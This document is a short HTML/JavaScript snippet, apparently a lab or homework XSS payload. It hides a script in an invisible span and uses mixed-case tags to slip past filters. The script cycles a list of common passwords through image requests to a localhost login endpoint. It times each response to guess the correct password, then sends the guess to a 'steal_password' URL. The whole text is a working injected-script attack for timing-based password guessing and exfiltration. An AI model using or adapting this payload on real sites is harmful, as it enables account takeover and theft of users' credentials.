<span style='display:none'>
  <iMg id='test'/>
  <sCript>
    var dictionary = [`password`, `123456`, `	12345678`, `dragon`, `1234`, `qwerty`, `12345`];
    var index = 0;
    var longest_time = 0;
    var pass_idx = 0;
    var password = dictionary[index];
    var test = document.getElementById(`test`);
    test.onerror = () => {
      var end = new Date();
      var time_elapsed = end - start;
      if (time_elapsed > longest_time) {
        longest_time = time_elapsed;
        pass_idx = index;
      }
      console.log(`Time elapsed ${end-start}`);
      start = new Date();
      password = dictionary[index];
      if (index < dictionary.length) {
        test.src = `http://localhost:3000/get_login?username=userx&password=${password}`;
      } else {
        theft_url = `http://localhost:3000/steal_password?password=${dictionary[pass_idx]}&timeElapsed=${longest_time}`;
        const theft = new Image();
        theft.src = theft_url;
      }
      index += 1;
    };
    var start = new Date();
    test.src = `http://localhost:3000/get_login?username=userx&password=${password}`;
    index += 1;
  </sCript>
</span>
